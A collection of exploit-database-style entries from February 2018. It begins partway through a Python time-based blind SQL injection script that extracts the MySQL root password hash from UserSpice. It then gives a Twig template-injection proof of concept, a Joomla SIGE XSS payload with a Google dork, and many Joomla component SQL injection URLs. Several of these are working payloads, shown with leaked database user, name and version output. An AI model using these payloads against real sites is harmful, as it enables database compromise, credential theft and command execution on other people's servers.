    # Fetch the page and pull the anti-CSRF token out of the form
    req = s.get(url).text
    soup = BeautifulSoup(req, "lxml")
    csrf = soup.find('input', {"name" : "csrf"})
    csrf_token = csrf['value']
    return csrf_token

login_data_csrf = getCSRF(userspice_login_url)
login_data['csrf'] = login_data_csrf
req = s.post(userspice_login_url, data=login_data)

if 'login failed' in req.text.lower():
    print('Login failed, check username/password')
    sys.exit(1)

payload_data_csrf = getCSRF(userspice_vuln_url)
payload['csrf'] = payload_data_csrf
print(banner)
print('[+] Running...')
print('[+] Obtaining MySQL root hash... this may take some time.')
password = ""
for i in range(0, 61):
    for c in guess_chars:
        payload_data_csrf = getCSRF(userspice_vuln_url)
        payload['csrf'] = payload_data_csrf
        injection = "5); SELECT 1 UNION SELECT IF(BINARY SUBSTRING(password,{0},1)='{1}',BENCHMARK(3000000,SHA1(1)),0) Password FROM mysql.user WHERE User = 'root'#;".format(i, c)
        payload['removePermission[]'] = injection
        req = s.post(userspice_vuln_url, data=payload).elapsed.total_seconds()
        # A slow response means the BENCHMARK() branch ran, i.e. the guess matched
        if float(req) > 0.6:
            password += c
            print('[+] %s' % password)
        else:
            pass

print('done')
sys.exit(0)
            
Vulnerability details:
# Exploit Title: Twig <2.4.4 Server side template injection 
# Date: 02/15/2018
# Exploit Author: JameelNabbo
# Author website: www.jameelnabbo.com
# Vendor Homepage: https://twig.symfony.com 
# Software Link: https://twig.symfony.com/doc/2.x/intro.html#installation
# Version: < 2.4.4
# Tested on: MAC OSX

1.Description:
Twig is a modern PHP template engine which compiles templates down to plain optimized PHP code. Twig < 2.4.4 contains an SSTI vulnerability which allows attackers to execute commands within the parameters, by just using {{COMMAND TO EXECUTE}} instead of the expected values ("normal integer or normal string"). This depends on the vulnerable application, which takes different params by GET or POST.

Example: by injecting this in a search param: http://localhost/search?search_key={{4*4}}         Output: 16


2. POC:
http://localhost/search?search_key={{4*4}} 
OUTPUT: 4 

http://localhost/search?search_key={{ls}} 
OUTPUT: list of files/directories etc….
            
# Exploit Title: Joomla! Component SIGE version <= 3.2.3 Cross-site Scripting
# Date: 15-02-2018
# Software Link: https://downloads.kubik-rubik.de/joomla-extensions/plg_sige_v3.2.3.zip
# Exploit Author: Alwin Peppels
# Website: www.onvio.nl
# CVE: CVE-2017-16356
# Category: webapps

1. Description
Kubik-Rubik Simple Image Gallery Extended (SIGE) contains an XSS in the
'print.php' file.
Insufficient sanitization of the 'caption' URL parameter allows injection
of Javascript into the page.
In versions <= 3.2.0 the 'name' and 'img' parameters are vulnerable as well.
Google dork: inurl:plugin_sige/print.php

The version of the SIGE plugin can be determined with this file:
[JOOMLA]/plugins/content/sige/sige.xml

2. Proof of Concept


 [JOOMLA]/plugins/content/sige/plugin_sige/print.php?img=x&caption=<img%20src=x%20onerror=alert(%27XSS%27)>

3. Solution:

Update to version 3.3.0
https://downloads.kubik-rubik.de/joomla-extensions/plg_sige_v3.3.0.zip
            
# # # # 
# Exploit Title: Joomla! Component Advertisement Board 3.1.0 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://ordasoft.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/advertisement-board/
# Version: 3.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5982
# # # # 
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_advertisementboard&Itemid=132&task=show_rss_categories&catname=[SQL]
# 
# # # #

Joomla! Component Advertisement Board v3.0.4
id parameter, v3.0.4 previously found.

https://www.exploit-db.com/exploits/41600
            
# # # #
# Exploit Title: Joomla! Component DT Register 3.2.7 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://www.dthdevelopment.com/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/dt-register/
# Version: 3.2.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6584
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_dtregister&task=edit&controller=category&id=[SQL]
# 
# # # #
            
# # # #
# Exploit Title: Joomla! Component AllVideos Reloaded 1.2.x - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://allvideos.fritz-elfert.de
# Software Link: http://joomlacode.org/gf/project/allvideos15/frs/?action=FrsReleaseBrowse&frs_package_id=3564
# Version: 1.2.x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5990
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_avreloaded&view=popup&Itemid=55&divid=[SQL]
#  
# 
# # # #
            
# # # #
# Exploit Title: Joomla! Component Aist <= 2.0 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://aist.bmstu.ru/
# Software Link: http://aist.bmstu.ru/
# Version: <= 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5993
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_aist&view=showvacancy&id=[SQL]
#  
# 
# # # #




https://kcst.bmstu.ru/forums/index.php?topic=1213.0
http://aist.bmstu.ru/
AIST (АИСТ) is implemented as a component for the Joomla! 1.5 content management system (CMS) and is a subsystem of the website of a graduate employment assistance center (service) or of an educational institution.
            
# # # #
# Exploit Title: Joomla! Component Fastball 2.5 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.fastballproductions.com/
# Software Link: http://www.fastballproductions.com/
# Version: 2.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6373
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_fastball&view=player&season=[SQL]
#  
# 
# # # #

inurl:index.php?option=com_fastball season
            
# # # #
# Exploit Title: Joomla! Component File Download Tracker 3.0 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://techsolsystem.com/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/downloads/file-download-tracker/
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6004
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?dynfield[phone]=[SQL]&option=com_dtracker&task=save
#  
#  
# 2)
# http://localhost/[PATH]/index.php?option=com_dtracker&layout=download&sess=[SQL]
#  
#  
# # # #
            
# # # # 
# Exploit Title: Joomla! Component Gallery WD 1.3.6 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://web-dorado.com/
# Software Link: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd/
# Software Download: https://web-dorado.com/?option=com_wdsubscriptions&view=dwnldfree&format=row&id=162
# Version: 1.3.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5981
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_gallery_wd&tag_id=&view=GalleryBox&gallery_id=7[SQL]
# 
# 
# 2)
# http://localhost/[PATH]/index.php?option=com_gallery_wd&tag_id=[SQL]&view=GalleryBox&gallery_id=7
# 
# 
# # # #


http://localhost/Joomla375/index.php?option=com_gallery_wd&tag_id=(UPDATEXML(1,CONCAT(0x2e,database(),(SELECT (ELT(2=2,1))),version()),8599))&view=GalleryBox &gallery_id=7
1105 XPATH syntax error: 'joomla375110.1.21-MariaDB' 

http://localhost/Joomla375/index.php?option=com_gallery_wd&tag_id=&view=GalleryBox&gallery_id=%37%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%37%30%39%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%37%30%39%32%3d%37%30%39%32%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29
1105 XPATH syntax error: '\10.1.21-MariaDB1joomla375'
            
# # # #
# Exploit Title: Joomla! Component Google Map Landkarten <= 4.2.3 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.joomla-24.de/
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/google-map-landkarten/
# Software Download: http://www.joomla-24.de/download/send/9-komponenten/85-google-map-landkarten
# Version: <= 4.2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6396
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=[SQL]&id=1&format=raw
# 
# 
# 2)
# http://localhost/[PATH]/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=[SQL]&format=raw
# 
# 
# 3)
# http://localhost/[PATH]/index.php?option=com_gmap&view=gm_modal&tmpl=component&layout=default&map=[SQL]
# 
# 
# # # #

 
http://localhost/Joomla375/index.php?option=com_gmap&view=gm_modal&tmpl=component&layout=default&map='+/*!08888AND*/+EXTRACTVALUE(66,CONCAT(0x5c,(/*!08888SELECT*/+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),(SELECT+(ELT(4762=4762,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))--+VerAyari
1105 XPATH syntax error: '\bahistanitim<br>cmslite<br>doct' 

http://localhost/Joomla375/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1' AND (SELECT 6142 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e,(SELECT (ELT(6142=6142,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ptYA&id=1&format=raw
1062 Duplicate entry 'IHSAN SENCAN1root@localhost : joomla375 : 10.1.21-MariaDB1' for key 'group_key' 

http://localhost/Joomla375/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=1+AND+EXTRACTVALUE(4855,CONCAT(0x5c,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),(SELECT+(ELT(4855=4855,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))&format=raw
1105 XPATH syntax error: '\qpjkq1root@localhost : joomla37'
            
# # # #
# Exploit Title: Joomla! Component Form Maker 3.6.12 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://demo.web-dorado.com/
# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/form-maker/
# Version: 3.6.12
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5991
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_formmaker&view=stats&id=[SQL]
#  
# 
# 2)
# http://localhost/[PATH]/index.php?option=com_formmaker&view=stats&form_id=1&id=1&from=[SQL]
#  
# 
# 3)
# http://localhost/[PATH]/index.php?option=com_formmaker&view=stats&form_id=1&id=1&to=[SQL]
#  
# 
# # # #





1
http://localhost/Joomla375/index.php?option=com_formmaker&view=stats&id=1'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+- 
root@localhost : joomla375 : 10.1.21-MariaDB

2
http://localhost/Joomla375/index.php?option=com_formmaker&view=stats&form_id=1&id=1&from=1%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d%20
root@localhost : joomla375 : 10.1.21-MariaDB

3
http://localhost/Joomla375/index.php?option=com_formmaker&view=stats&form_id=1&id=1&to=1%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d%20
root@localhost : joomla375 : 10.1.21-MariaDB
            
# # # #
# Exploit Title: Joomla! Component InviteX 3.0.5 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://techjoomla.com/
# Software Link: https://extensions.joomla.org/extensions/extension/content-sharing/bookmark-a-recommend/invitex/
# Version: 3.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6394
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_invitex&view=invites&invite_type=[SQL]&invite_anywhere=1
#  
#  
# # # #
            
# # # #
# Exploit Title: Joomla! Component JB Bus 2.3 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://joombooking.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jbtransport/
# Version: 2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6372
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_bookpro&view=orderdetail&order_number=[SQL]
#  
#  
# # # #
            
# # # # 
# Exploit Title: Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor: http://coderspirit.blogspot.com.tr/2011/07/jquickcontact.html
# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/jquickcontact/
# Download: https://sourceforge.net/projects/jquickcontact/files/latest/download
# Version: 1.3.2.2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5983
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jquickcontact&task=refresh&sid=[SQL]
# 
# 
# # # #
            
# # # #
# Exploit Title: Joomla! Component JomEstate PRO <= 3.7 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://comdev.eu/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/jomestate-pro/
# Version: <= 3.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6368
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jomestate&task=detailed&id=[SQL]
#  
# 
# # # #
            
# # # # 
# Exploit Title: Joomla! Component JGive 2.0.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://techjoomla.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/donations/jgive/
# Version: 2.0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5970
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jgive&view=campaigns&layout=all&filter_org_ind_type=[SQL]
# 
# 
# 2)
# http://localhost/[PATH]/index.php/more/campaigns-in-pin-display/campaigns/all/search/:?campaign_countries=[SQL]
# 
# 
# # # #
            
# # # #
# Exploit Title: Joomla! Component JS Autoz 1.0.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.joomsky.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/js-autoz/
# Software Download: http://joomsky.com/js-autoz-download.html
# Version: 1.0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6006
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&vtype=[SQL]
#  
# 
# 2)
# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&pre=[SQL]
#  
# 
# 3)
# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&prs=[SQL]
#  
#  
# # # #
            
# # # #
# Exploit Title: Joomla! Component JS Jobs 1.1.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.joomsky.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/js-jobs/
# Software Download: http://www.joomsky.com/5/download/1.html
# Version: 1.1.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5994
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)...Everyone
# http://localhost/[PATH]/index.php/component/jsjobs/newest-jobs?zipcode=[SQL]&option=com_jsjobs&task11=view
#  
# 
# 2)...Users
# http://localhost/[PATH]/index.php?option=com_jsjobs&c=resume&view=resume&layout=view_resume&bd=1&sortby=1&ta=[SQL]
#  
# 
# # # #